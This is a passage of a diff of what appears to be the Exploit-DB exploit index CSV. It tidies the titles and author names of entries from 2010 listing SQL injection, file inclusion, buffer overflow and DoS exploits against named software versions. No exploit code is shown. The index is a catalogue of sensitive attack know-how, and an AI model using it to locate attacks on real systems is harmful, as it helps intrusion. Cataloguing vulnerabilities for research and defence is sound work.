EGroupware Premium Line 9.1 Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",php,webapps,0 -11778,platforms/php/webapps/11778.txt,"OSSIM v2.2 Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",php,webapps,0 +11778,platforms/php/webapps/11778.txt,"OSSIM 2.2 - Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",php,webapps,0 11779,platforms/windows/local/11779.pl,"Windisc Stack BOF exploit",2010-03-16,Rick2600,windows,local,0 11780,platforms/php/webapps/11780.html,"Clain_TIger_CMS CSRF Vulnerability",2010-03-17,"Pratul Agrawal",php,webapps,0 11781,platforms/php/webapps/11781.html,"chilly_CMS CSRF Vulnerability",2010-03-17,"Pratul Agrawal",php,webapps,0 @@ -10775,15 +10775,15 @@ id,file,description,date,author,platform,type,port 11788,platforms/php/webapps/11788.txt,"PHP-Nuke ratedownload SQL Injection",2010-03-17,ItSecTeam,php,webapps,0 11789,platforms/multiple/local/11789.c,"VariCAD 2010-2.05 EN Local buffer overflow",2010-03-17,n00b,multiple,local,0 11790,platforms/php/webapps/11790.txt,"Joomla Component com_vxdate Multiple Vulnerabilities",2010-03-17,MustLive,php,webapps,0 -11791,platforms/windows/local/11791.pl,"myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)",2010-03-18,n3w7u,windows,local,0 +11791,platforms/windows/local/11791.pl,"myMP3-Player 3.0 - (.m3u) Local Buffer Overflow Exploit (SEH)",2010-03-18,n3w7u,windows,local,0 11792,platforms/multiple/dos/11792.pl,"mplayer <= 4.4.1 NULL pointer dereference exploit poc",2010-03-18,"Pietro Oliva",multiple,dos,0 11793,platforms/jsp/webapps/11793.txt,"Manage Engine Service Desk Plus 7.6 woID SQL Injection",2010-03-18,"Nahuel Grisolia",jsp,webapps,0 11794,platforms/windows/local/11794.c,"MediaCoder (.lst) file local Buffer Overflow Exploit",2010-03-18,"fl0 fl0w",windows,local,0 11795,platforms/php/webapps/11795.txt,"DewNewPHPLinks 2.1.0.1 LFI",2010-03-18,ItSecTeam,php,webapps,0 11797,platforms/windows/local/11797.py,"ZippHo 3.0.6 (.zip) 0day stack buffer overflow PoC exploit",2010-03-18,mr_me,windows,local,0 11799,platforms/php/webapps/11799.txt,"SiteDone Custom Edition 2.0 SQL Injection & XSS Vulnerability",2010-03-18,d3v1l,php,webapps,0 -11801,platforms/php/webapps/11801.txt,"phpAuthent 0.2.1 SQL Injection Vulnerability",2010-03-18,Gamoscu,php,webapps,0 -11802,platforms/php/webapps/11802.txt,"philboard v1.02 sql injection Vulnerability",2010-03-18,ViRuS_HiMa,php,webapps,0 +11801,platforms/php/webapps/11801.txt,"phpAuthent 0.2.1 SQL Injection Vulnerability",2010-03-18,Gamoscu,php,webapps,0 +11802,platforms/php/webapps/11802.txt,"philboard 1.02 - SQL Injection Vulnerability",2010-03-18,ViRuS_HiMa,php,webapps,0 11803,platforms/windows/dos/11803.txt,"Crimson Editor SEH Overwrite Vulnerability",2010-03-18,sharpe,windows,dos,0 11805,platforms/php/webapps/11805.txt,"phpscripte24 Niedrig Gebote Pro Auktions System II Blind SQL Injection",2010-03-18,"Easy Laster",php,webapps,0 11806,platforms/php/webapps/11806.txt,"Nensor CMS 2.01 Multiple Remote Vulnerabilities",2010-03-18,cr4wl3r,php,webapps,0 @@ -10792,7 +10792,7 @@ id,file,description,date,author,platform,type,port 11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP server 1.0.0 Pre-Authentication DoS (PoC)",2010-03-19,loneferret,windows,dos,21 11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21 11811,platforms/php/webapps/11811.txt,"phpscripte24 Preisschlacht Liveshop System SQL Injection (seite&aid) index.php",2010-03-19,"Easy Laster",php,webapps,0 -11813,platforms/php/webapps/11813.txt,"Multi CSRF vulnerability in DirectAdmin (1.34.4)",2010-03-19,K053,php,webapps,0 +11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multi CSRF vulnerability",2010-03-19,K053,php,webapps,0 11814,platforms/php/webapps/11814.txt,"joomla component & plugin JE Tooltip Local File Inclusion",2010-03-19,"Chip D3 Bi0s",php,webapps,0 11815,platforms/php/webapps/11815.txt,"joomla component Gift Exchange com_giftexchange (pkg) Remote Sql Injection",2010-03-20,"Chip D3 Bi0s",php,webapps,0 11816,platforms/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System BLIND SQL Injection auktion.php (id_auk)",2010-03-20,"Easy Laster",php,webapps,0 @@ -10800,8 +10800,8 @@ id,file,description,date,author,platform,type,port 11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Stack BOF",2010-03-20,corelanc0d3r,windows,remote,0 11822,platforms/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence managnmnet Hardware[MIPS] Improper Authentication",2010-03-20,FB1H2S,hardware,remote,0 11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software ttx.cgi Remote File Download",2010-03-20,n01d,cgi,webapps,0 -11824,platforms/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack <= v3.0 ts_other.php SQL Injection Exploit",2010-03-21,"Easy Laster",php,webapps,0 -11825,platforms/php/webapps/11825.html,"Adult Video Site Script Multiple Vulnerabilities",2010-03-21,indoushka,php,webapps,0 +11824,platforms/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack <= 3.0 - ts_other.php SQL Injection Exploit",2010-03-21,"Easy Laster",php,webapps,0 +11825,platforms/php/webapps/11825.html,"Adult Video Site Script Multiple Vulnerabilities",2010-03-21,"indoushka salah el ddine",php,webapps,0 11826,platforms/php/webapps/11826.txt,"Jewelry Cart Software (product.php) SQL Injection Vulnerability",2010-03-21,Asyraf,php,webapps,0 11827,platforms/windows/dos/11827.py,"no$gba 2.5c (.nds) local crash",2010-03-21,l3D,windows,dos,0 11828,platforms/windows/local/11828.py,"Crimson Editor r3.70 SEH Overwrite Vulnerability PoC exploit",2010-03-21,mr_me,windows,local,0 @@ -10810,13 +10810,13 @@ id,file,description,date,author,platform,type,port 11831,platforms/php/webapps/11831.txt,"WebMaid CMS <= 0.2-6 Beta Multiple Remote File Include Vulnerability",2010-03-21,cr4wl3r,php,webapps,0 11832,platforms/php/webapps/11832.txt,"NotSopureEdit <= 1.4.1 Remote File Include Vulnerability",2010-03-21,cr4wl3r,php,webapps,0 11833,platforms/php/webapps/11833.txt,"4x cms <= r26 (Auth Bypass) SQL Injection Vulnerability",2010-03-21,cr4wl3r,php,webapps,0 -11834,platforms/windows/local/11834.py,"Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit",2010-03-22,mr_me,windows,local,0 +11834,platforms/windows/local/11834.py,"Kenward Zipper 1.4 - Stack Buffer Overflow PoC Exploit (0day)",2010-03-22,mr_me,windows,local,0 11835,platforms/php/webapps/11835.txt,"Mini CMS RibaFS 1.0 (Auth Bypass) SQL Injection Vulnerability",2010-03-22,cr4wl3r,php,webapps,0 11836,platforms/php/webapps/11836.txt,"CMS Openpage (index.php) SQL Injection Vulnerability",2010-03-22,Phenom,php,webapps,0 11837,platforms/php/webapps/11837.txt,"Uiga Fan Club SQL Injection Vulnerability",2010-03-22,"Sioma Labs",php,webapps,0 11838,platforms/windows/dos/11838.php,"SAFARI APPLE 4.0.5 (object tag) (JavaScriptCore.dll) DoS (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0 11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 Local Crash PoC",2010-03-22,b0telh0,windows,dos,0 -11840,platforms/php/webapps/11840.txt,"PowieSys <= 0.7.7 alpha index.php (shownews) SQL Injection Vulnerability",2010-03-22,"Easy Laster",php,webapps,0 +11840,platforms/php/webapps/11840.txt,"PowieSys <= 0.7.7 alpha index.php (shownews) SQL Injection Vulnerability",2010-03-22,"Easy Laster",php,webapps,0 11841,platforms/php/webapps/11841.txt,"New Advisore Stack Ver 1.1 Directory Traversal",2010-03-22,R3VAN_BASTARD,php,webapps,0 11842,platforms/windows/dos/11842.py,"FreeSSHD 1.2.4 Remote Buffer Overflow DoS",2010-03-22,Pi3rrot,windows,dos,0 11844,platforms/php/webapps/11844.txt,"Joomla Component com_flash SQL Injection Vulnerability",2010-03-22,"DevilZ TM",php,webapps,0 @@ -10832,7 +10832,7 @@ id,file,description,date,author,platform,type,port 11856,platforms/multiple/remote/11856.txt,"uhttp Server Path Traversal Vulnerability",2010-03-23,"Salvatore Fresta",multiple,remote,0 11857,platforms/windows/remote/11857.c,"MX Simulator Server Remote Buffer Overflow PoC",2010-03-23,"Salvatore Fresta",windows,remote,0 11861,platforms/windows/dos/11861.pl,"Smart PC Recorder 4.8 .MP3 Local Crash POC",2010-03-24,chap0,windows,dos,0 -11862,platforms/php/webapps/11862.txt,"Easy-Clanpage <= v2.0 Blind SQL Injection Exploit",2010-03-24,"Easy Laster",php,webapps,0 +11862,platforms/php/webapps/11862.txt,"Easy-Clanpage <= 2.0 - Blind SQL Injection Exploit",2010-03-24,"Easy Laster",php,webapps,0 11863,platforms/php/webapps/11863.txt,"CMS By SoftnSolv (index.php) SQL Injection Vulnerable",2010-03-24,"Th3 RDX",php,webapps,0 11864,platforms/php/webapps/11864.txt,"E-php CMS SQL Injection Vulnerability",2010-03-24,"Th3 RDX",php,webapps,0 11865,platforms/php/webapps/11865.txt,"Joomla component com_universal Remote File Inclusion Vulnerability exploit",2010-03-24,eidelweiss,php,webapps,0 @@ -10840,14 +10840,14 @@ id,file,description,date,author,platform,type,port 11867,platforms/php/webapps/11867.txt,"Joomla Component com_wallpapers SQL Injection Vulnerability",2010-03-24,"DevilZ TM",php,webapps,0 11868,platforms/php/webapps/11868.txt,"Joomla Component com_software SQL Injection Vulnerability",2010-03-24,"DevilZ TM",php,webapps,0 11871,platforms/php/webapps/11871.txt,"Vbulletin Blog 4.0.2 Title XSS Vulnerability",2010-03-24,FormatXformat,php,webapps,0 -11872,platforms/windows/local/11872.py,"KenWard's Zipper v1.400 Buffer Overflow - Method 2",2010-03-25,sinn3r,windows,local,0 +11872,platforms/windows/local/11872.py,"KenWard's Zipper 1.400 - Buffer Overflow - Method 2",2010-03-25,sinn3r,windows,local,0 11873,platforms/php/webapps/11873.txt,"Interactivefx.ie CMS SQL Injection Vulnerability",2010-03-25,Inj3ct0r,php,webapps,0 11874,platforms/php/webapps/11874.txt,"INVOhost SQL Injection",2010-03-25,"Andrés Gómez",php,webapps,0 -11875,platforms/php/webapps/11875.py,"Easy-Clanpage <= v2.01 SQL Injection Exploit",2010-03-25,"Easy Laster",php,webapps,0 +11875,platforms/php/webapps/11875.py,"Easy-Clanpage <= 2.01 - SQL Injection Exploit",2010-03-25,"Easy Laster",php,webapps,0 11876,platforms/php/webapps/11876.txt,"justVisual 2.0 (index.php) <= LFI Vulnerability",2010-03-25,eidelweiss,php,webapps,0 11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Stack BOF",2010-03-25,Sud0,windows,remote,21 11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 DoS",2010-03-25,_SuBz3r0_,windows,dos,69 -11879,platforms/windows/remote/11879.txt,"SAP GUI version 7.00 BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0 +11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0 11880,platforms/hardware/dos/11880.txt,"Lexmark Multiple Laser printer Remote Stack Overflow",2010-03-25,"Francis Provencher",hardware,dos,0 11881,platforms/php/webapps/11881.php,"SiteX CMS 0.7.4 beta (/photo.php) SQL-Injection exploit",2010-03-25,Sc0rpi0n,php,webapps,0 11882,platforms/php/webapps/11882.txt,"Direct News 4.10.2 Multiple Remote File Include Vulnerability",2010-03-25,mat,php,webapps,0 @@ -10857,26 +10857,26 @@ id,file,description,date,author,platform,type,port 11886,platforms/windows/remote/11886.py,"SAP MaxDB Malformed Handshake Request Remote Code Execution",2010-03-26,"S2 Crew",windows,remote,0 11888,platforms/php/webapps/11888.txt,"DaFun Spirit 2.2.5 Multiple Remote File Include Vulnerability",2010-03-26,2010-03-26,php,webapps,0 11889,platforms/php/webapps/11889.txt,"leaftec cms multiple vulnerabilities",2010-03-26,Valentin,php,webapps,0 -11890,platforms/hardware/dos/11890.txt,"Bad ""VML"" Remote DoS on Safari for iPhone & iPod Touch",2010-03-26,"Nishant Das Patnaik",hardware,dos,0 -11891,platforms/hardware/dos/11891.txt,"Remote DoS on Safari for iPhone & iPod Touch",2010-03-26,"Nishant Das Patnaik",hardware,dos,0 +11890,platforms/hardware/dos/11890.txt,"iOS Safari - Bad ""VML"" Remote DoS",2010-03-26,"Nishant Das Patnaik",hardware,dos,0 +11891,platforms/hardware/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",hardware,dos,0 11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection Vulnerability",2010-03-26,"Hussin X",php,webapps,0 11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0 11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability",2010-03-26,eidelweiss,php,webapps,0 11895,platforms/php/webapps/11895.txt,"CyberCMS Remote SQL Injection Vuln.",2010-03-26,hc0de,php,webapps,0 11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - [ CSRF ] Create Administrator Account",2010-03-26,bi0,php,webapps,0 11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite (Module Jokes) SQL-Injection Exploit",2010-03-26,Sc0rpi0n,php,webapps,0 -11898,platforms/php/webapps/11898.py,"Date & Sex Vor und Rückwärts Auktions System <= v2 Blind SQL Injection Exploit",2010-03-27,"Easy Laster",php,webapps,0 +11898,platforms/php/webapps/11898.py,"Date & Sex Vor und Rückwärts Auktions System <= 2 - Blind SQL Injection Exploit",2010-03-27,"Easy Laster",php,webapps,0 11899,platforms/php/webapps/11899.html,"AdaptCMS_Lite_1.5 2009-07-07",2010-03-27,ItSecTeam,php,webapps,0 -11900,platforms/windows/local/11900.pl,"Mini-stream RM-MP3 Converter Version 3.0.0.7 (.pls) Universal Stack BoF",2010-03-27,mat,windows,local,0 -11902,platforms/php/webapps/11902.txt,"MyOWNspace_v8.2 multi local file include",2010-03-27,ItSecTeam,php,webapps,0 +11900,platforms/windows/local/11900.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - (.pls) Universal Stack BoF",2010-03-27,Mat,windows,local,0 +11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multi Local File Include",2010-03-27,ItSecTeam,php,webapps,0 11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 multi file include",2010-03-27,ItSecTeam,php,webapps,0 11904,platforms/php/webapps/11904.txt,"68kb multi remote file include",2010-03-27,ItSecTeam,php,webapps,0 11905,platforms/php/webapps/11905.txt,"Simple Machines Forum <= 1.1.8 (avatar) Remote PHP File Execute PoC",2010-03-27,JosS,php,webapps,0 11906,platforms/php/webapps/11906.txt,"Uebimiau Webmail <= 2.7.2 Multiple Vulnerabilities.",2010-03-27,cp77fk4r,php,webapps,0 11908,platforms/php/webapps/11908.txt,"Joomla Component com_solution SQL Injection Vulnerability",2010-03-27,"DevilZ TM",php,webapps,0 11909,platforms/windows/local/11909.txt,"Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit",2010-03-28,"Hazem Mofeed",windows,local,0 -11911,platforms/windows/local/11911.py,"Stud_PE <= v2.6.05 Stack Overflow PoC exploit",2010-03-28,zha0,windows,local,0 -11912,platforms/php/webapps/11912.txt,"Multi Auktions Komplett System V2 <= Blind SQL Injection Exploit",2010-03-28,"Easy Laster",php,webapps,0 +11911,platforms/windows/local/11911.py,"Stud_PE <= 2.6.05 - Stack Overflow PoC exploit",2010-03-28,zha0,windows,local,0 +11912,platforms/php/webapps/11912.txt,"Multi Auktions Komplett System 2 - Blind SQL Injection Exploit",2010-03-28,"Easy Laster",php,webapps,0 11914,platforms/php/webapps/11914.txt,"Joomla Component com_adds Blind SQL Injection Vulnerability",2010-03-28,"DevilZ TM",php,webapps,0 11915,platforms/php/webapps/11915.txt,"Joomla Component com_tariff SQL Injection Vulnerability",2010-03-28,"DevilZ TM",php,webapps,0 11916,platforms/php/webapps/11916.txt,"Joomla Component com_agency SQL Injection Vulnerability",2010-03-28,"DevilZ TM",php,webapps,0 @@ -10885,15 +10885,15 @@ id,file,description,date,author,platform,type,port 11919,platforms/php/webapps/11919.txt,"Joomla Component com_topmenu SQL Injection Vulnerability",2010-03-28,"DevilZ TM",php,webapps,0 11920,platforms/php/webapps/11920.txt,"Joomla Component com_personal SQL Injection Vulnerability",2010-03-28,"DevilZ TM",php,webapps,0 11922,platforms/php/webapps/11922.txt,"Devana SQL Injection vulnerability",2010-03-28,Valentin,php,webapps,0 -11923,platforms/php/webapps/11923.txt,"TSOKA:CMS v1.1 , v1.9 AND v2.0 SQL Injection & XSS Vulnerability",2010-03-28,d3v1l,php,webapps,0 +11923,platforms/php/webapps/11923.txt,"TSOKA:CMS 1.1 & 1.9 & 2.0 - SQL Injection & XSS Vulnerability",2010-03-28,d3v1l,php,webapps,0 11924,platforms/php/webapps/11924.txt,"Joomla Component com_units SQL Injection Vulnerabilit",2010-03-28,"DevilZ TM",php,webapps,0 -11925,platforms/php/webapps/11925.txt,"68kb Knowledge Base Script v1.0.0rc2 Search SQL Injection",2010-03-28,"Jelmer de Hen",php,webapps,0 +11925,platforms/php/webapps/11925.txt,"68kb Knowledge Base Script 1.0.0rc2 Search - SQL Injection",2010-03-28,"Jelmer de Hen",php,webapps,0 11927,platforms/php/webapps/11927.txt,"Joomla Component com_departments SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0 11928,platforms/php/webapps/11928.txt,"Joomla Component com_business SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0 11929,platforms/php/webapps/11929.txt,"Joomla Component com_radio SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0 -11930,platforms/windows/dos/11930.pl,"ASX to MP3 Converter Version 3.0.0.100 Local Stack Overflow POC",2010-03-29,mat,windows,dos,0 -11931,platforms/asp/webapps/11931.txt,"Asp - comersus7F Shopping Cart Software Backup Dump Vulnerability",2010-03-29,"indoushka ",asp,webapps,0 -11932,platforms/linux/dos/11932.txt,"xwine v1.0.1 (.exe file) Local Crash PoC Exploit",2010-03-29,JosS,linux,dos,0 +11930,platforms/windows/dos/11930.pl,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow POC",2010-03-29,Mat,windows,dos,0 +11931,platforms/asp/webapps/11931.txt,"Asp - comersus7F Shopping Cart Software Backup Dump Vulnerability",2010-03-29,"indoushka salah el ddine",asp,webapps,0 +11932,platforms/linux/dos/11932.txt,"xwine 1.0.1 (.exe file) - Local Crash PoC Exploit",2010-03-29,JosS,linux,dos,0 11934,platforms/php/webapps/11934.txt,"Powie's PSCRIPT Gästebuch <= 2.09 SQL Injection Vulnerability",2010-03-29,"Easy Laster",php,webapps,0 11935,platforms/php/webapps/11935.txt,"Joomla Component com_guide SQL Injection Vulnerability",2010-03-30,"DevilZ TM",php,webapps,0 11938,platforms/php/webapps/11938.txt,"Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 Multiple Local File Vulnerability",2010-03-30,eidelweiss,php,webapps,0 @@ -10902,59 +10902,59 @@ id,file,description,date,author,platform,type,port 11941,platforms/php/webapps/11941.txt,"Joomla Component com_items SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0 11942,platforms/php/webapps/11942.txt,"Joomla Component com_actions SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0 11943,platforms/php/webapps/11943.txt,"React software [local file inclusion]",2010-03-29,SNK,php,webapps,0 -11944,platforms/windows/local/11944.pl,"ASX to MP3 Converter Version 3.0.0.100 (.pls) Universal Stack Overflow Exploit",2010-03-28,mat,windows,local,0 -11946,platforms/php/webapps/11946.txt,"FaMarket.V2 (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0 -11947,platforms/php/webapps/11947.txt,"Yamamah Version 1.00 Mullti Vulnerability",2010-03-30,indoushka,php,webapps,0 -11948,platforms/php/webapps/11948.txt,"Denapars Shop Script Mullti Vulnerability",2010-03-30,indoushka,php,webapps,0 -11949,platforms/php/webapps/11949.txt,"Fa-Ads (Auth Bypass) Vulnerability",2010-03-30,"indoushka ",php,webapps,0 -11950,platforms/php/webapps/11950.txt,"Fa Home (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0 -11951,platforms/php/webapps/11951.txt,"E-book Store Mullti Vulnerability",2010-03-30,indoushka,php,webapps,0 +11944,platforms/windows/local/11944.pl,"ASX to MP3 Converter 3.0.0.100 - (.pls) Universal Stack Overflow Exploit",2010-03-28,Mat,windows,local,0 +11946,platforms/php/webapps/11946.txt,"FaMarket 2 - (Auth Bypass) Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0 +11947,platforms/php/webapps/11947.txt,"Yamamah 1.00 - Mullti Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0 +11948,platforms/php/webapps/11948.txt,"Denapars Shop Script Mullti Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0 +11949,platforms/php/webapps/11949.txt,"Fa-Ads (Auth Bypass) Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0 +11950,platforms/php/webapps/11950.txt,"Fa Home (Auth Bypass) Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0 +11951,platforms/php/webapps/11951.txt,"E-book Store Mullti Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0 11953,platforms/windows/local/11953.py,"RM Downloader 3.0.2.1 (.asx) Local Buffer Overflow (SEH)",2010-03-30,b0telh0,windows,local,0 11954,platforms/php/webapps/11954.txt,"Wazzum Dating Software Mullti Vulnerability",2010-03-30,"El-Kahina ",php,webapps,0 -11955,platforms/windows/dos/11955.py,"All to All Audio Convertor v2.0 Files Stack Overflow PoC",2010-03-30,ItSecTeam,windows,dos,0 +11955,platforms/windows/dos/11955.py,"All to All Audio Convertor 2.0 - Files Stack Overflow PoC",2010-03-30,ItSecTeam,windows,dos,0 11957,platforms/windows/local/11957.py,"Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow",2010-03-30,b0telh0,windows,local,0 -11958,platforms/windows/local/11958.py,"ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit",2010-03-30,"Hazem Mofeed",windows,local,0 +11958,platforms/windows/local/11958.py,"ASX to MP3 Converter 3.0.0.100 - Local stack overflow exploit",2010-03-30,"Hazem Mofeed",windows,local,0 11959,platforms/windows/dos/11959.pl,"Xilisoft Blackberry Ring Tone Maker .wma Local Crash",2010-03-30,anonymous,windows,dos,0 11960,platforms/php/webapps/11960.txt,"KimsQ 040109 Multiple Remote File Include Vulnerability",2010-03-30,mat,php,webapps,0 -11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability",2010-03-30,indoushka,php,webapps,0 +11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0 11963,platforms/php/webapps/11963.txt,"Huron CMS 8 11 2007 (Auth Bypass) SQL Injection Vulnerability",2010-03-30,mat,php,webapps,0 -11964,platforms/multiple/webapps/11964.pl,"Easy-Clanpage <= v2.1 SQL Injection Exploit",2010-03-30,"Easy Laster",multiple,webapps,0 -11965,platforms/php/webapps/11965.txt,"kora Reinstall Admin Information Vulnerability",2010-03-30,indoushka,php,webapps,0 +11964,platforms/multiple/webapps/11964.pl,"Easy-Clanpage <= 2.1 - SQL Injection Exploit",2010-03-30,"Easy Laster",multiple,webapps,0 +11965,platforms/php/webapps/11965.txt,"kora Reinstall Admin Information Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0 11966,platforms/windows/dos/11966.py,"Easy Icon Maker .ico File Reading Crash",2010-03-30,ItSecTeam,windows,dos,0 -11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery by Pass Remote Upload Vulnerability",2010-03-30,indoushka,php,webapps,0 -11968,platforms/php/webapps/11968.txt,"Hosting-php-dynamic (Auth Bypass) Vulnerability",2010-03-30,"indoushka ",php,webapps,0 +11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery by Pass Remote Upload Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0 +11968,platforms/php/webapps/11968.txt,"Hosting-php-dynamic (Auth Bypass) Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0 11973,platforms/windows/remote/11973.txt,"CompleteFTP Server Directory Traversal",2010-03-30,zombiefx,windows,remote,0 11974,platforms/windows/remote/11974.py,"HP OpenView NNM OvWebHelp.exe CGI Topic overflow",2010-03-30,"S2 Crew",windows,remote,0 -11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 0-day",2010-03-30,"Richard Leahy",windows,dos,0 +11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 (0day)",2010-03-30,"Richard Leahy",windows,dos,0 11976,platforms/windows/local/11976.php,"Free MP3 CD Ripper 2.6 (wav) 1day stack buffer overflow PoC exploit",2010-03-31,mr_me,windows,local,0 11977,platforms/windows/dos/11977.pl,"CDTrustee .BAK Local Crash POC",2010-03-31,anonymous,windows,dos,0 11978,platforms/php/webapps/11978.txt,"Joomla Component DW Graph Local File Inclusion",2010-03-31,"Chip d3 bi0s",php,webapps,0 -11979,platforms/php/webapps/11979.pl,"Centreon IT & Network Monitoring v2.1.5 - Injection SQL",2010-03-31,"Jonathan Salwan",php,webapps,0 -11980,platforms/php/webapps/11980.txt,"Easy-Clanpage <= v2.2 multiple SQL Injection + Exploit",2010-03-31,"Easy Laster",php,webapps,0 +11979,platforms/php/webapps/11979.pl,"Centreon IT & Network Monitoring 2.1.5 - Injection SQL",2010-03-31,"Jonathan Salwan",php,webapps,0 +11980,platforms/php/webapps/11980.txt,"Easy-Clanpage <= 2.2 - multiple SQL Injection + Exploit",2010-03-31,"Easy Laster",php,webapps,0 11981,platforms/windows/local/11981.py,"WM Downloader 3.0.0.9 (.asx) Local Buffer Overflow",2010-03-31,b0telh0,windows,local,0 11983,platforms/php/webapps/11983.txt,"Joomla Component com_actions SQL Injection Vulnerability",2010-03-31,"DevilZ TM",php,webapps,0 -11984,platforms/windows/dos/11984.py,"Optimal Archive v1.38 (.zip) 0day SEH PoC",2010-03-31,TecR0c,windows,dos,0 +11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - (.zip) SEH PoC 0day",2010-03-31,TecR0c,windows,dos,0 11985,platforms/windows/dos/11985.sh,"BitComet <= 1.19 Remote DoS Exploit",2010-03-31,"Pierre Nogues",windows,dos,0 11986,platforms/linux/remote/11986.py,"OpenDcHub 0.8.1 Remote Code Execution Exploit",2010-03-31,"Pierre Nogues",linux,remote,0 11987,platforms/windows/dos/11987.txt,"Escape From PDF",2010-03-31,"Didier Stevens",windows,dos,0 -11989,platforms/php/webapps/11989.txt,"Faweb_2 Mullti Vulnerability",2010-03-30,"indoushka ",php,webapps,0 +11989,platforms/php/webapps/11989.txt,"Faweb_2 Mullti Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0 11990,platforms/php/webapps/11990.txt,"Joomla Component com_network SQL Injection Vulnerability",2010-04-01,"DevilZ TM",php,webapps,0 11991,platforms/php/webapps/11991.txt,"Joomla Component com_tour SQL Injection Vulnerability",2010-04-01,"DevilZ TM",php,webapps,0 11992,platforms/php/webapps/11992.txt,"Joomla Component com_trading Blind SQL Injection Vulnerability",2010-04-01,"DevilZ TM",php,webapps,0 11993,platforms/php/webapps/11993.txt,"Simply Sites RGV Local File Inclusion",2010-04-01,"DevilZ TM",php,webapps,0 -11994,platforms/php/webapps/11994.txt,"DynPG CMS v4.1.0 Multiple Vulnerabilities",2010-04-01,eidelweiss,php,webapps,0 +11994,platforms/php/webapps/11994.txt,"DynPG CMS 4.1.0 - Multiple Vulnerabilities",2010-04-01,eidelweiss,php,webapps,0 11995,platforms/php/webapps/11995.txt,"ALPHA CMS Local File Inclusion Vulnerability",2010-04-01,eidelweiss,php,webapps,0 11996,platforms/php/webapps/11996.txt,"Joomla Component EContent Local File Inclusion",2010-04-01,"Chip D3 Bi0s",php,webapps,0 11997,platforms/php/webapps/11997.txt,"Joomla Component Jvehicles Local File Inclusion",2010-04-01,"Chip D3 Bi0s",php,webapps,0 11998,platforms/php/webapps/11998.txt,"Joomla Component User Status Local File Inclusion",2010-04-01,"Chip D3 Bi0s",php,webapps,0 11999,platforms/php/webapps/11999.txt,"Joomla Component webERPcustomer Local File Inclusion",2010-04-01,"Chip D3 Bi0s",php,webapps,0 -12000,platforms/windows/dos/12000.pl,"Kwik Pay Payroll v4.10.3 .mdb Crash PoC",2010-04-01,anonymous,windows,dos,0 -12001,platforms/windows/dos/12001.pl,"Kwik Pay Payroll v4.10.3 .zip DoS",2010-04-01,anonymous,windows,dos,0 -12002,platforms/php/webapps/12002.txt,"Musicbox Version 3.3 Upload Shell Vulnerability",2010-04-01,indoushka,php,webapps,0 +12000,platforms/windows/dos/12000.pl,"Kwik Pay Payroll 4.10.3 - (.mdb) Crash PoC",2010-04-01,Anonymous,windows,dos,0 +12001,platforms/windows/dos/12001.pl,"Kwik Pay Payroll 4.10.3 - (.zip) DoS",2010-04-01,Anonymous,windows,dos,0 